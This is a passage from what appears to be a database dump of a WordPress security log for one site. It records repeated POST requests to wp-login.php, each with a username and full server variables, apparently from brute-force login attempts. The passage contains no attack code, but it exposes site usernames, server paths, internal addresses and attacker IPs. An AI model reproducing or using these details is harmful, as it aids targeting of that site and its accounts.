_wptn=c2l0ZW1hbmFnZXI7YWRtbmlAQEA%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62442\";s:11:\"REMOTE_ADDR\";s:14:\"109.176.202.52\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746812533.3093569;s:12:\"REQUEST_TIME\";i:1746812533;}}','109.176.202.52',1,'2025-05-09 23:12:14','2025-05-10 23:12:14'),(95105,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746827038.5918391;s:12:\"REQUEST_TIME\";i:1746827038;}}','13.201.84.118',1,'2025-05-10 03:14:00','2025-05-11 04:14:48'),(95106,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746827038.5894971;s:12:\"REQUEST_TIME\";i:1746827038;}}','13.201.84.118',1,'2025-05-10 03:14:00','2025-05-11 04:14:47'),(95107,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746827038.590049;s:12:\"REQUEST_TIME\";i:1746827038;}}','13.201.84.118',1,'2025-05-10 03:14:00','2025-05-11 04:14:47'),(95108,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746827040.2899611;s:12:\"REQUEST_TIME\";i:1746827040;}}','13.201.84.118',1,'2025-05-10 03:14:01','2025-05-11 04:14:48'),(95109,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746827040.269978;s:12:\"REQUEST_TIME\";i:1746827040;}}','13.201.84.118',1,'2025-05-10 03:14:01','2025-05-11 04:14:47'),(95110,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746827265.3436799;s:12:\"REQUEST_TIME\";i:1746827265;}}','13.201.84.118',1,'2025-05-10 03:17:47','2025-05-11 04:14:47'),(95111,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746827265.3573551;s:12:\"REQUEST_TIME\";i:1746827265;}}','13.201.84.118',1,'2025-05-10 03:17:47','2025-05-11 04:14:48'),(95112,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746827265.329988;s:12:\"REQUEST_TIME\";i:1746827265;}}','13.201.84.118',1,'2025-05-10 03:17:47','2025-05-11 04:14:47'),(95113,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746827265.39028;s:12:\"REQUEST_TIME\";i:1746827265;}}','13.201.84.118',1,'2025-05-10 03:17:47','2025-05-11 04:14:47'),(95114,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746827265.3910301;s:12:\"REQUEST_TIME\";i:1746827265;}}','13.201.84.118',1,'2025-05-10 03:17:47','2025-05-11 04:14:48'),(95115,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; 